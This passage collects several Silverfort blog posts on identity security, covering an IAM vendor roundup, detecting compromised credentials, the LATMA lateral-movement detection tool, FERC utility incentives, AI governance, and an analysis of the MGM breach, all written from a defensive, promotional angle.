mechanisms. Evaluating the Leading IAM Tools in the Market Robust IAM is imperative for efficient identity and access management. The current market leaders include: Microsoft Entra ID Entra ID offers a comprehensive IAM suite, ideal for organizations deeply embedded in the Microsoft ecosystem. It stands out for its SSO capabilities across multiple Microsoft and third-party applications, enhancing user access management. Its Conditional Access feature allows for detailed access control policies, enhancing security. Okta Okta is a cloud-based IAM platform with a user-friendly design and extensive pre-built integrations with various applications. Okta is ideal for streamlined access management, offering features like SSO, MFA, and adaptive authentication. Ping Identity Ping Identity offers diverse features like SSO, MFA, and identity governance, focusing on granular user access control and strict policy enforcement. Its versatility in supporting various authentication methods enhances its adaptability. IBM Security Identity and Access Management IBM's suite, including IBM Security Access Manager and IBM Identity Governance and Intelligence, is known for its scalability and advanced access control. It is ideally suited for large enterprises with complex IAM requirements, as it combines user authentication, policy enforcement and governance, and managing diverse user bases and regulatory compliance. ForgeRock Identity Platform ForgeRock addresses a broad spectrum of identity management needs, including Customer Identity and Access Management (CIAM). It's an optimal choice for organizations aiming to boost customer engagement, allowing seamless management of identities across various channels and easy integration with customer-centric applications. OneLogin OneLogin is a cloud-based IAM solution that offers swift deployment. It simplifies integration efforts by providing SSO, MFA, and adaptive authentication, and has a broad range of connectors for third-party applications. It’s ideal for businesses seeking a simple, scalable, and user-friendly IAM option. SailPoint IdentityNow SailPoint IdentityNow is ideal for compliance and role-based access control. It facilitates efficient identity management, automates provisioning and deprovisioning, and ensures adherence to compliance standards. It also offers an intuitive interface for complex IAM operations. Silverfort IAM Integration Silverfort offers a unified identity protection platform that consolidates security controls across on-prem ,cloud and hybrid environments, and can automatically discover and analyze access attempts and identity threats. Silverfort's key feature is its ability to provide full visibility into user and service accounts, and extend security controls such as MFA, conditional access and risk-based authentication policies to legacy on-prem resources. Silverfort's unified identity protection platform integrates seamlessly with existing systems and IT infrastructures, including Active Directory (AD), Entra ID, legacy homegrown applications, file shares, and command-line tools. Lastly, Silverfort offers a unified approach that not only provides a consistent, less confusing experience but also means that users don't have to authenticate multiple times just because they're accessing resources managed by different IAM tools. --- - Published: 2023-10-01 - Modified: 2024-07-04 - URL: https://www.silverfort.com/blog/detecting-compromised-credentials/ A critical and often understated security threat among cybersecurity threats is compromised credentials. With attackers increasingly targeting user login details, such breaches have become a primary catalyst for cyber intrusions. Verizon's 2022 Data Breach Investigations Report indicates that compromised credentials are involved in nearly half of all cyberattacks, highlighting the need for robust defenses against these vulnerabilities. In most cases, these credential theft incidents occur when unauthorized individuals obtain legitimate user credentials through phishing, brute-force attacks, credential stuffing attacks, social engineering, or exploiting security weaknesses. This access enables attackers to infiltrate networks and systems, often undetected, by disguising themselves as legitimate users. Due to the stealthy nature of such attacks, they can be seamlessly integrated into regular user activities, bypassing traditional security measures designed primarily for external threats. Understanding the Threat Landscape The threat landscape surrounding compromised credentials is both diverse and sophisticated, making it a formidable challenge for cybersecurity teams. It is common for attackers to use a variety of tactics to obtain credentials, such as sophisticated phishing schemes, exploiting system vulnerabilities, and employing social engineering techniques. The methods of attack are constantly evolving, making it essential for organizations to keep up to date with the latest attack vectors. The impact of credential compromise goes beyond mere unauthorized access. It may result in more severe consequences such as data breaches, financial losses, and reputational damage. It is common for attackers to use stolen credentials to perform actions that appear legitimate, as this makes their activities harder to detect and enables them to move laterally within a network, escalate privileges, and access sensitive data. The rise of remote work and increased reliance on cloud-based services has expanded the potential attack surface. This shift necessitates a more comprehensive approach to identity and access management. Traditional perimeter-based defenses are no longer sufficient; organizations need to implement robust identity-centric security measures that encompass all users and endpoints, regardless of their location. Identity: The New Attack Surface Identity has become the new attack surface in cybersecurity as a result of the shift towards digital and cloud-based solutions. As the security perimeter extends beyond traditional network boundaries to individual identities, protecting user credentials becomes as crucial as safeguarding the network itself. This paradigm shift demands a more focused approach to identity security. Silverfort's innovative solutions address this evolving attack surface by enhancing identity protection. With advanced authentication measures and continuous monitoring of user behavior, Silverfort's technologies offer an added layer of defense, ensuring that compromised credentials do not lead to unauthorized access, thus fortifying the organization's cybersecurity posture. Techniques for Detecting Compromised Credentials Detecting compromised credentials requires a multifaceted approach that leverages advanced technologies and strategies to identify unauthorized access. One key method is the implementation of User Entity and Behavioral Analytics (UEBA). UEBA systems, which are integral to modern Security Information and Event Management (SIEM) platforms, use machine learning to establish normal behavior patterns for each user. In order to identify potentially compromised accounts, the system monitors deviations from these patterns. Another effective technique involves the creation of preassembled user activity timelines. With this feature, which is usually found in advanced UEBA solutions, a chronological sequence of user actions is automatically generated, simplifying the process of identifying suspicious activity. As a result of this approach, not only is the response time to potential threats shortened but also the likelihood of false positives is reduced, as well as the investigation process is simplified. Combining technological solutions with human expertise is also crucial. While automated systems provide valuable data, experienced security professionals play an important role in interpreting this information and making informed decisions. As a result of the combination of technology and expertise, an effective defense strategy against credential compromise can be developed. Silverfort's Unified Identity Protection platform is designed to detect and prevent attacks that utilize compromised credentials to access enterprise resources. It does this through continuous monitoring of all access requests across all authentication protocols, for both user-to-machine and machine-to-machine access, across all resources and environments. When Silverfort identifies abnormal activity, such as during lateral movement attacks, it can step up the authentication requirements in real-time to block access or require the user to authenticate with Multi-Factor Authentication (MFA). This is possible due to Silverfort's holistic visibility into the entire authentication activity of each user, which enables it to evaluate the behavior profile of users with high precision. For example, in a scenario where an attacker attempts to log in to a machine using compromised user credentials, Silverfort's policy would require MFA. The actual user, the legitimate owner of the credentials, would be prompted to verify the authentication. If the attacker can't complete the authentication, access to the resource is blocked, and the Security Operations Center (SOC) is immediately notified by Silverfort about the attempt. Furthermore, Silverfort's platform integrates with Identity Providers in the enterprise environment to apply continuous monitoring, risk analysis, and access policy enforcement on each and every access attempt to any on-prem and cloud resource. This extends Risk-Based Authentication and MFA to resources and access interfaces that could not have been protected before, including Active Directory command line remote access interfaces upon which automated ransomware propagation relies. In the case of automated ransomware propagation, which utilizes authentication with compromised credentials, Silverfort's continuous monitoring and real-time risk analysis can help detect and prevent such attacks. Optimizing Event Response with Preassembled User Activity Timelines A rapid response to potential threats is essential in cybersecurity. Using preassembled user activity timelines is one of the most effective ways to optimize event response. This technique, integral to advanced User Entity and Behavioral Analytics (UEBA) systems, automatically compiles a detailed chronological sequence of user actions. Through this functionality, security teams will be able to gain a comprehensive understanding of user behavior in order to quickly identify and investigate anomalies. Preassembled timelines transform the incident response process. Analysts are able to quickly identify the sequence of events leading to a security alert, distinguish between malicious activities and benign operational changes, and make informed decisions in a timely manner. As a result, this capability significantly reduces the time traditionally required to assemble data narratives manually, thus speeding up the response to security incidents. It is especially beneficial to have these timelines in complex environments, where the sheer volume of activities can make manual analysis time-consuming and prone to errors. The use of preassembled timelines permits a more efficient and accurate assessment of potential security incidents by providing a clear and immediate narrative of events. Silverfort’s Unified Identity Protection platform leverages UEBA to continuously monitor all access requests across all authentication protocols and environments. It uses behavioral analysis to identify abnormal activity patterns. By doing this, Silverfort is able to detect potential threats and compromised credentials, as well as step-up authentication requirements in real-time to prevent unauthorized access. Behavior analysis is also used to assess the risk associated with every authentication attempt, providing actionable insights into overall account activity to the Security Operations Center (SOC) This approach not only streamlines the incident response process but also reinforces the overall security posture of the organization. Best Practices for Detection and Mitigation of Compromised Credential Attacks To maintain robust security defenses, cybersecurity professionals must detect and mitigate compromised credential attacks. The following are some best practices to consider: Implement Continuous Monitoring and Adaptive Security Measures: Establishing a continuous monitoring system is essential for detecting anomalies in real-time. To respond to cyber threats, adaptive security measures are essential, as they adapt based on observed behaviors and emerging threats. By implementing this approach, potential breaches are identified and addressed promptly, reducing the window of opportunity for attackers. Employ Advanced Technologies like UEBA for Deeper Insights into User Behavior: Utilizing User Entity and Behavioral Analytics (UEBA) provides an in-depth analysis of user activities and identifies deviations from typical behavior patterns. As a result of UEBA's sophisticated algorithms, it is possible to detect subtle anomalies that may indicate compromised credentials, providing an early warning system against potential breaches. Combine Automated Solutions with Expert Analysis for a Comprehensive Defense Strategy: While automated technologies like UEBA are powerful tools for detecting compromised credentials, they are most effective when combined with human expertise. Based on the insights provided by automated systems, skilled analysts can interpret the data, provide context, and make informed decisions. This blend of technology and human intelligence is key to a well-rounded cybersecurity strategy. Stay Updated with the Latest Threat Intelligence and Adapt Security Protocols Accordingly: The cybersecurity landscape is constantly evolving, with new threats emerging regularly. Staying informed about the latest trends and threat intelligence is crucial for adapting and updating security protocols effectively. This proactive approach helps organizations keep one step ahead of potential attackers. Silverfort's solutions play a vital role in this enhanced security posture. By integrating seamlessly with existing Identity and Access Management (IAM) infrastructures, Silverfort’s Identity Threat Detection and Response (ITDR) and UEBA technologies provide comprehensive protection. They not only detect unusual access attempts that may indicate compromised credentials but also actively prevent unauthorized access. This proactive stance, leveraging advanced analytics and adaptive response mechanisms, positions Silverfort as a formidable ally in the fight against credential compromise, ensuring a more secure and resilient digital environment for your organization. --- - Published: 2023-09-28 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/open-sourcing-our-lateral-movement-detection-tool-latma/ Collect authentication traffic from Active Directory, create a detailed report (and GIF) that outlines lateral movement patterns Lateral movement detection is a challenge every cybersecurity researcher is likely familiar with. My team and I faced this challenge a few months ago and, unsurprisingly, quickly discovered there is no easy or fast solution to address it. Well, after a little trial and error, my team and I developed an algorithm named “LATMA” (short for Lateral Movement Analyzer) to significantly improve our ability to detect lateral movement. Knowing detecting lateral movement is a challenge for nearly every SOC team, we decided to implement it as a free, open sourced tool, which identifies all suspicious movements in an environment, and creates a detailed report. LATMA consists of two modules:  Logs Collector – This module collects authentication traffic from the Active Directory (AD) environment. It gathers the logs from the domain controllers and endpoints, focusing only on interactive Kerberos and NTLM authentications. This LATMA module is open-source and can be found here on Github. Analyzer Module – This module inputs the logs from the collector and outputs a detailed report containing the patterns that LATMA found, how they’re connected, and who performed them and when. It also visualizes the findings in a GIF. The free LATMA Analyzer Module can be found under resources on the Silverfort website. Sometimes the hardest part in dealing with an alert is not just knowing it happened but convincing your team that it was not a false alarm. The output of the LATMA tool is readable and clear to address this challenge. We ran LATMA on dozens of data sets from different environments. The bottom line is that it detected 95% of lateral movements and generated a false alarm approximately once every three days — almost 30 times better than other existing algorithms! Watch this full demo of LATMA, from 16:54 – 30:44 With the MGM and Caesars hack top of mind, we’ll do what we can to help our fellow security practitioners speed up detection. In the rest of this post, I’ll explain the challenge of detecting lateral movement and show you how my team thought through this algorithm to get much better results than other tools available. Understanding Lateral Movement By Examining a Recent Attack Before discussing the detection of lateral movement, let’s first define exactly what it is. And there’s no better way to do this than by using an example. A few months ago, hackers from the cybercriminal group Lapsus$ gained access to Uber’s systems via a VPN with regular user credentials they acquired using a social engineering technique called “MFA bombing. ” The attackers scanned the network to find valuable information and eventually found a PowerShell script that contained admin credentials. They then used this admin’s credentials to log in to a database and expose sensitive company information. This attack consisted of several steps: Getting initial access to Uber’s systems — in this case through social engineering. Searching for information and then using it to access other machines in the network and obtain privileged credentials. Using these privileged credentials to fulfill a malicious objective — in this case, exposing sensitive information. Those three steps occur in almost every successful breach. However, only the second step is considered lateral movement since it signals the attackers’ ability to move successfully across an organization’s network. This is the step I’ll focus on. Understanding the Role Authentication Plays in Lateral Movement Movement between machines requires authentication. During this phase, the attacker needs to provide credentials to the identity provider, and only after these are verified can they advance to a target machine. The problem is that normal movement between machines requires authentication as much as malicious movement, and both leave the same traces. This makes distinguishing between normal and malicious movement very hard. One approach to tackling this is through the detection of anomalies; however, this has its own challenges since many anomalies are actually not malicious. For example, when an employee goes to their IT department for help and the IT person logs in to the computer of the person who asked for assistance, this is an anomaly — but obviously not a malicious one. Sadly, this is why simple anomaly detection algorithms are not very useful — and why my team and I developed the LATMA algorithm to overcome this obstacle. The Three Steps to LATMA Detection Step 1: Build a Graph for Abnormal Authentication Traffic In this step, LATMA digests the entirety of authentication traffic in the organization and determines which authentications look normal and which appear abnormal. It does this using information about the domain, such as computer/user roles and their expected behavior. Then authentications are used to build a graph representing the network, where every node represents a computer and every edge represents an authentication. As mentioned previously, though, finding anomalies is not enough to detect lateral movement, so there are several more steps in the process. Step 2: Finding Patterns of Lateral Movement In this step, we take the authentication graph from the previous step as input and search for lateral movement patterns. These patterns are associated with different types of malicious intent. We classify the patterns into three categories: Search patterns – Before attackers perform any movement, they will likely search for a good target to advance to. The pattern is many authentications from a single source (representing the attacker’s current location) to multiple servers. Advance patterns – These represent the attackers’ movement between different network assets. The attackers might steal credentials along the way and then use them to advance. Act patterns – Usually these occur towards the end of the breach when the attackers have started to fulfill their malicious objectives. These patterns are often characterized by massive automatic access to multiple machines at once in order to steal information or run malware. Step 3: Alerting LATMA generates an alert when at least two of these patterns happen in sequence. For example, if the attacker searches for a target machine to advance to and then successfully advances to it, the algorithm generates an alert. In the example, the attack could have been stopped before the acting pattern, because the algorithm generates an alert if it detects an acting pattern connecting to another pattern. Acting patterns usually mean that the attacker has already fulfilled their objectives. In this case, the output of the algorithm can help with the investigation.   The Proof of LATMA Is in the Results If you’ve read this far, I hope you’re convinced that this algorithm and tool have value. So I also want to show you that it is extremely accurate. As part of my job at Silverfort, I get to see authentication traffic from hundreds of different environments, and you might be surprised to learn that many of them are targeted by lateral movement attempts. We know this because either our customer discovered this or Silverfort’s platform alerted us to it. That makes this data good for validation, training algorithms, and testing hypotheses. We ran LATMA on dozens of data sets from different environments. The bottom line is that it detected 95% of lateral movements and generated a false alarm approximately once every three days — almost 30 times better than other existing algorithms! Future Work: Where We’re Going With This The work on the algorithm helped me and my team better understand and model lateral movement attacks. It also made me realize that, despite the significant improvement, there is still a long way to go. Attack surfaces are evolving quickly and attackers have more and more opportunities to take advantage of this, for example by moving from an on-prem environment to the cloud and vice-versa. So a potential enhancement to this algorithm would include logs and events from cloud environments and detection for lateral movement that crosses platforms. Stay tuned for more news around LATMA and be sure to let us know your feedback about this tool. --- - Published: 2023-09-27 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-silverfort-can-enable-utility-companies-take-advantage-of-ferc-incentives/ The constant evolution of cyber threats has made it much more challenging for organizations to protect their identities and secure access to all resources. This is especially true in the utility sector, which continues to experience an increase in cyberattacks that threaten its reliability. In response to a congressional directive to address this growing threat, the Federal Energy Regulatory Commission (FERC) recently revised its regulations to provide utilities the opportunity to receive an incentive-based rate recovery when they make certain pre-qualified cybersecurity investments or join a threat information-sharing program. These investments will benefit consumers by encouraging utilities to invest in an Advanced Cybersecurity Technology program and participate in cybersecurity threat information-sharing programs, as directed by the Infrastructure Investment and Jobs Act (IIJA) of 2021. In this post, we will explain what the incentives for the Advanced Cybersecurity Investment program entail and how Silverfort can help utilities take advantage of the incentives by FERC and to invest in solutions like Silverfort. What is the Advanced Cybersecurity Investment Program? On July 3, 2023, utilities throughout the United States became eligible to join the Incentives for Advanced Cybersecurity Investment program, a voluntary cyber incentive framework established by the Federal Energy Regulatory Commission under the Infrastructure Investment and Jobs Act developed by the Biden administration. The order offers an incentive program for qualified investments in cybersecurity. Using this incentive, utilities will be able to claim deferred cost recovery for eligible cybersecurity investments, allowing utilities to include the unamortized portion in their rate base. This incentive applies to expenses such as operation and maintenance costs, labor costs, implementation costs, network monitoring costs, training costs, and software-as-a-service (SaaS) costs. As part of the program, expenses and capital investments are associated with advanced cybersecurity technology as well as participation in a cybersecurity threat information sharing program. Section 219A of the Federal Power Act (FPA) defines Advanced Cybersecurity Technology as “any technology, operational capability, or service, including computer hardware, software, or related assets, that enhances the security posture of public utilities through improvements in the ability to protect against, detect, respond to, or recover from a cybersecurity threat. ” The new rule also alleviates one of the main challenges faced by owners and operators of critical infrastructure: a lack of available financial resources to invest in cybersecurity. Eligibility for the Advanced Cybersecurity Investment Program In order to qualify for incentive-based rate treatment, FERC requires energy utilities to align their cybersecurity investments with the following criteria: Increases cybersecurity either by implementing Advanced Cybersecurity Technology or participating in a threat information-sharing program. Is not already mandated by the Reliability Standards( NERC Reliability Standards define the reliability requirements for planning and operating the North American bulk power system. ), or otherwise mandated by local, state, or federal law, decision, or directive; otherwise legally mandated; or an action taken in response to a federal or state agency merger condition, consent decree from a federal or state agency, or settlement agreement that resolves a dispute between a utility and a public or private party Additionally, the program defined a period of time during which utilities may seek incentive treatment for a particular investment. Specifically, a utility may not request incentive treatment if it has already incurred costs for the investment for more than three months before filing the incentive application. The Notice of Proposed Rulemaking (NOPR) established two frameworks to identify the types of expenditures eligible for an incentive: 1. Pre-qualified (PQ) list approach: The PQ list will include expenditures as part of the Cyber Risk Information Sharing Program (CRISP) – a public-private partnership that provides relevant and actionable cybersecurity information to participants from the United States electricity industry – as well as expenditures associated with internal network security monitoring of the utility's cyber systems. 2. Case-by-case approach: To allow utilities to request incentives for tailored solutions, FERC will also evaluate cybersecurity expenditures not identified on the PQ list on a case-by-case basis. According to this policy, FERC will allow utilities to receive incentives for cybersecurity investments made as part of their compliance with cybersecurity-related NERC reliability standards for a period of time between when the standards are approved by FERC and when they become effective. According to the rule, other potential investments that have not yet been defined by the Commission require "a high degree of confidence that such items will likely materially improve cybersecurity for all utilities. " FERC will re-evaluate the pre-qualified investment list periodically. Why Is This Program Critical for Electric Utilities? Because utilities have historically been unable to protect legacy resources with modern security controls, the U. S. electricity grid is an especially attractive target for malicious actors. In failing to take a more proactive approach to security, they are inadvertently providing threat actors with a way to breach resources, resulting in the risk of operational disruption. Because these security controls are not in place, utility organizations also encounter difficulties in complying with existing industry regulations and standards. According to a research report by cybersecurity firm Black Kite, over 25% of the 150 top U. S. energy companies are highly susceptible to ransomware attacks. As the number of cyberattacks targeting the electric grid increases, the establishment of incentive-based rate treatments for utilities to invest in advanced cybersecurity technologies is a step in the right direction when it comes to helping utility companies modernize their infrastructure, prevent incidents, and comply with requirements. How Silverfort Can Help Utilities Maximize Cybersecurity Investments The traction of clean energy initiatives is causing electric power companies to embrace digital transformation. As a result, new innovations are rapidly transforming electric utilities. However, for many power authorities, these benefits are overshadowed by increasing cybersecurity risks. The consequences of this troublesome reality have already manifested in recent years as highly disruptive state-sponsored attacks against electric grids. To mitigate these risks and, ultimately, gain cyber and operational resilience, all segments of the electric utilities industry must embrace a holistic cyber security strategy that protects users' access to critical resources. This is where Silverfort comes into play. Silverfort has pioneered the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource; automate the discovery, monitoring, and protection of service accounts; and proactively prevent lateral movement and ransomware spread attacks. Silverfort connects to all domain controllers and other on-prem identity providers (IdPs) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt made by users, admins, or service accounts. By utilizing Silverfort's identity protection platform, utilities can better prepare themselves to comply with FERC cybersecurity rules in order to qualify for incentive-based rate treatment. Using Silverfort's rule-based and risk-based authentication and MFA authentication capabilities can significantly improve utilities' cybersecurity posture by protecting them against an expanded threat landscape and ensuring they are cyber resilient. Want to increase your resilience to identity threats and be aligned with FERC's Advanced Cybersecurity Investment program? Schedule a call with one of our experts. --- - Published: 2023-09-25 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/why-ai-needs-good-governance/ Throughout my career, I’ve found that one principle remains true: Although technology constantly changes, the patterns that govern it remain steady. Over the last 30 years, I’ve seen huge shifts in technology: from mainframe computing to desktop computing to cloud computing, not to mention a host of new code-development approaches. Yet, despite these changes, I’ve found that governance patterns stay the same. Time and again I’ve seen people ignore those patterns, suggesting that the new way no longer needs the previous controls. And I’ve also seen these same people learn – often painfully – that indeed those patterns remained true and relevant. Today, Artificial Intelligence (AI) is all the rage. It is the hot new technology everyone’s talking about. The sheer hive-mind processing power of AI – its ability to interpret language and apply complex logic to find answers in just seconds – has immense potential. Yet it’s essential to remember that AI is still in its infancy. The technology is immature, untrained, and ungoverned. If it is to become a productive part of our society, it must be governed by the same principles that have governed all previous technology. So what are the time-tested patterns we need to apply to AI? Here are five: AI Access Rights Must Be Controlled and Limited The proven principle of least privilege must be applied to AI engines and any software that incorporates them. I’ve been approached by vendors selling AI-powered technology who have asked for the keys to the kingdom — the ability to read and write to the most sensitive areas of my company. Organizations need to exercise great care when connecting to AI-enabled technologies. AI Is an Identity and Must Be Governed as Such All proven patterns of onboarding, certification, recertification, and termination must apply to an AI identity. This means incorporating best practices around privileged access management, just-in-time access, and service account protection with the AI engine. Treat it like a person, and govern it like any other identity in your organization. AI Must Be Monitored Comprehensive monitoring is a proven pattern to detect anomalous behavior, including identifying rogue or compromised insiders. AI should be no different. Like any entity, it is subject to misuse by bad actors and capable of being manipulated into breaking rules and acting outside of its original purpose. We must monitor AI for deviations and indicators of malicious activity (IoMA), and be able to respond accordingly — including disabling access and isolating threats. The Integrity, Accuracy, and Validity of AI Inputs and Outputs Much Be Checked and Limited by Validations and Rules We’ve long proven the value of peer reviews, input and output validations in code, and other integrity-validation processes. These patterns must also be applied to AI as well. We must peer-check the output, perhaps with alternative AI or human actors; we must govern what inputs can be given by defining rules around input and access; we must govern the output; and we must apply the principles of data loss prevention (DLP) and intellectual property protection (IPP) to any implementation of AI that could access our critical corporate data. AI Needs Lifecycle and Software Configuration Management We must apply the proven principles of building test environments, rigorously validating and controlling change, and putting approval processes in place before allowing changes to AI systems. Because AI can dynamically change in production, but we should put guardrails in place. Production control is essential to prevent any unintended consequences of AI-powered software that were not well tested before implementation. Certainly, there are more things to consider, but my rule of thumb is this: Treat AI like any other employee, identity, or system. Apply the same thinking and controls that you would for any of those. Don’t assume it to be infallible or all-knowing. Apply proven patterns to it, just as with previous technologies. In so doing you will keep your reputation, your customers, and the crown jewels of your company safe. Interested in learning how Silverfort can help govern AI and protect identty? Reach out to one of our experts today. --- - Published: 2023-09-21 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/mgm-breach-takeaway-on-prem-has-become-attackers-gateway-to-the-cloud/ Last week, the BlackCat ransomware group (also known as ALPHV) attacked the operations of MGM Resorts and forced them to shut down their IT systems. What sets this attack apart from more traditional ransomware attacks is that at a certain point attackers were able to leverage their domain dominance of the on-prem environment to compromise the cloud identity infrastructure, harvesting cleartext passwords of Okta users. The attack now joins others – including against Okta, Uber, and Cisco – in marking a new pattern that exploits the interconnectivity of the on-prem and SaaS environments to compromise the SaaS through the on-prem. This introduces a significant risk for all organizations today that have a hybrid environment (i. e. , employing both an on-prem and a cloud directory) and emphasizes the need of a unified identity protection approach. MGM Breach: Walking Through the Attack’s Stages From publicly available data we can construct the following flow: Attackers got information on LinkedIn about an employee, called the help desk and used social engineering to get access to the network. Following that, they performed lateral movement until they gained access to a domain controller (details on the exact techniques used in this stage remain unclear) and stole user passwords stored there. At this point, the attackers asked for the ransom and, when it was refused, subsequently installed ransomware on MGM’s ESXi servers, then persisted in their lateral movement until gaining access to Okta server. Once there, the attackers exfiltrated cleartext passwords from servers that then gave them the ability to log into Okta and access any of the SaaS apps it manages. On-Prem Domain Dominance Used as a Stepping Stone to the SaaS Environment What's interesting about this attack is that while hackers had access to Active Directory (AD) hashes, they did not have access to the passwords. Attackers used AD to pivot to Okta and managed to steal plaintext passwords. Essentially, Active Directory served as a gateway to Okta. This highlights the need for organizations to identify and address any weaknesses and misconfigurations in their identity infrastructure. Many organizations connect Active Directory to Okta but often overlook securing this connection, which in this case provided attackers with an opportunity to exploit the weakness. The Critical Gap of Hybrid Identity Infrastructure: Connected but Not Protected This breach highlights an inherent weakness that is all too commonly ignored – the fragmented and siloed nature of the identity infrastructure in the hybrid environment. Let’s now dive into this in more detail. Most organizations manage their on-prem users in Active Directory. In parallel, they manage the same users in a cloud directory of a federation server (e. g. , Entra ID, Okta, Ping, etc. ). To enable users to have a seamless login experience, these two different identity providers are synced – meaning that the same username and password combination is used to access both the on-prem and the SaaS resources. Additionally, the directory used for the SaaS apps often has some footprint in the on-prem environment (for example, the Okta server in the case of this breach). This connection implies that if an attacker has successfully compromised user credentials in the on-prem environment, they can then use them to directly log in to SaaS apps as well as move laterally and compromise the cloud identity infrastructure components in the on-prem environment. The On-Prem’s Exposure to Identity Threats Makes it the Ultimate Attack Vector to Compromise SaaS The recent white paper published by Osterman Research, “The State of the Identity Attack Surface: Insights into Critical Security Gaps,” clearly shows that the on-prem environment is critically vulnerable to the use of compromised credentials for malicious access. As the report details, traditional multi-factor authentication (MFA) and Privileged Access Management (PAM) solutions fail to provide sufficient real-time protection against identity threats for the vast majority of organizations. Threat actors are painfully aware of these blind spots and leverage them in performing lateral movement within the on-prem environment, encountering little to no resistance. And lateral movement is the X factor that turns a local event (such as a single compromised machine) into an enterprise-level incident, as the MGM breach illustrates. Conclusion: Identity Protection for On-Prem Equals Identity Protection for the Cloud Any chain is only as strong as its weakest link. And the hybrid environment is a chain where the on-prem and cloud are closely interwoven. Thus, strengthening the on-prem environment means strengthening the whole chain. Regardless of how far you’ve come in your cloud migration, if you still have an on-prem portion this is a serious exposure you need to address. But how exactly can organizations address this gap? After all, even before there was a cloud, there was no security solution that could mitigate the risk of lateral movement and prevent it in real time. Silverfort Unified Identity Protection Platform: Blocking Lateral Movement in Real Time Silverfort has pioneered the first Unified Identity Protection platform that’s purpose built to prevent identity threats in real time across any user, system, and environment. Silverfort integrates with the on-prem and cloud identity infrastructure to provide continuous monitoring, risk analysis and controls such as MFA or access blocking on every authentication and access attempt. In this way, Silverfort can bring identity protection to resources that could have never been protected before. An example is access to workstations and servers over command line via tools such as PsExec or Remote PowerShell. This type of access is the default way attackers perform lateral movement and is beyond the coverage of traditional MFA solutions. Silverfort is the first solution able to require MFA to detect and block malicious access of this type. How Silverfort Could Have Prevented an MGM-Like Attack Scenario As previously stated, it’s unclear exactly how the attackers performed the lateral movement attack in the network. But it is likely that Silverfort could have prevented this breach in two ways: Silverfort would have likely detected the lateral movement to Active Directory, stopping the attackers before they could compromise it. Alternatively, Silverfort would likely have detected the attackers moving from AD to Okta, thus preventing the compromise of the Okta server. The diagram below illustrates how Silverfort’s protection would have stopped the attack in its early stages: Does your organization have a hybrid environment? Find out more about how Silverfort can help reduce your risk. Schedule a call with one of our experts. --- - Published: 2023-09-12 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/the-voice-of-the-identity-practitioners-is-clear-identity-protection-is-broken/ As an identity security practitioner, it is not news to you that the identity attack surface is exposed. You already know that despite all your MFA and PAM efforts adversaries can still access your resources, confronting small to zero resistance. And there’s no one more qualified to know that better than yourself – after all you’re the one that’s accountable for the deployment and operation of these solutions. But have these insights really made their way into the minds of the decision-makers in your organization? This new report by Osterman, ‘The State of the Identity Attack Surface: Insights into Critical Security Gaps’ brings for the first time your voice to the forefront. You now have the numbers to back up your concerns. To gain insights into the actual security posture of the identity attack surface, Osterman research surveyed close to 650 security practitioners such as Identity Architects, Identity Infrastructure Managers, and Identity Management Managers. Here are some highlights that emerged from the survey that should not be surprising to you. Only 10. 7% of organizations manage to get their PAM solutions fully onboarded and working. Only 6. 7% of organizations manage to implement MFA on all their critical resources. Only 5. 7% of organizations have full visibility into their service accounts. This report focused on the three aspects that build up the resilience of your environment to the malicious use of compromised credentials: MFA, PAM, and service accounts. Let’s understand why these were chosen MFA: The Tested and Proven Method to Prevent Malicious Access It is well known that MFA significantly decreases the likelihood of a credential compromise being a successful attack. In spite of this, it is important to consider how and where MFA is used. By failing to protect the full scope of users and resources under attack, MFA's promise of enhanced security is diminished, since attackers can still access resources without having to be authenticated. Based on this approach, it is assumed that partial MFA deployment is not sufficient to protect the entire identity attack surface. PAM: Purpose-Built Protection for Admin Accounts Implementing PAM solutions is an ongoing challenge where you can't see the light at the end of the tunnel. It is mainly due to its long and complex deployment process that PAM programs often extend over months and even years, and in many cases, they do not reach their full potential. There are a number of reasons for this such as complexity, including the low to partial visibility identity teams have into privileged accounts in their environment, especially machine-to-machine service accounts. While most organizations are investing in PAM, few are fully deployed with all privileged accounts onboarded and protected. Service Accounts: Adversaries’ Target of Choice The ability to identify what service accounts exist is fundamental to the implementation of security controls. In order to avoid misuse of service accounts, visibility allows subsequent security controls to be implemented, and it is the responsibility of the organization to ensure they are achieving the desired protections. Only 32. 1% of our survey respondents believed they have a high level of visibility but not close to full visibility into their service account. Service accounts can be compromised just like any other user account within the environment. Unmonitored, high-privileged, and unprotected by MFA and PAM , they are the ideal compromise target for lateral movement and ransomware spread Assess your Environment's Resilience and Take Action Accordingly Read this report, not only to learn what your peers are struggling with but to benchmark your environment against the standard. Until now it was only you and your team who knew the harsh truth. We hope this report will be the first step in making it common knowledge - the first step towards fixing it. Read the full report --- - Published: 2023-09-11 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/identity-protection-cant-be-taken-for-granted-anymore/ The findings in report challenge the implicit trust that the purchase and deployment of an identity security solution equals protection Would you be surprised to learn that only 10% of organizations manage to get their PAM solution fully onboarded? That less than 7% manage to get MFA protection for the majority of their critical resources? That only 20% of identity security teams are confident in their ability to use these solutions to prevent malicious access with compromised credentials? A new report by Osterman Research, named ‘The State of the Identity Attack Surface: Insights into Critical Security Gaps’, reveals that the actual coverage of identity security solutions and practices is materially lower than most people think. A global survey among hands-on identity security practitioners shows that high exposure to account takeover, lateral movement, and ransomware spread is a norm rather than an outlier. In plane words: adversaries with compromised credentials encounter low to zero defenses when accessing targeted resources. The Protection of Identity Security Control Such as PAM and MFA Can’t be Taken for Granted The findings in report challenge the implicit trust that the purchase and deployment of an identity security solution equals protection. It is for you to take to your CISO and ask: ‘how do we stack up against what this report claims as the standard? ’. Maybe your organization is one of the few that have all identity protection lined up. But maybe there’s a gap in you MFA, PAM, or service account protection. You’d want to discover and resolve it before adversaries do. Critical Gap: Real-Time Protection Against the Malicious Use of Compromised Credentials The report goes over all the parameters that build up an organization’s ability to have real-time protection against identity threats such as the scope of covered resources and protected users. From the executive perspective, the importance of the report is it’s ability to provide you with the right questions to surface any existing gaps in your organization’s identity security posture. For example, the right question is not ‘do we have MFA? ’ bur rather ‘does our MFA protection applies to all our critical resources and users? ’. Not ‘do we have PAM? ’ but ‘Is our PAM solution fully onboarded or did we give up and settle for partial protection only? ’ Asking the Hard Questions is the 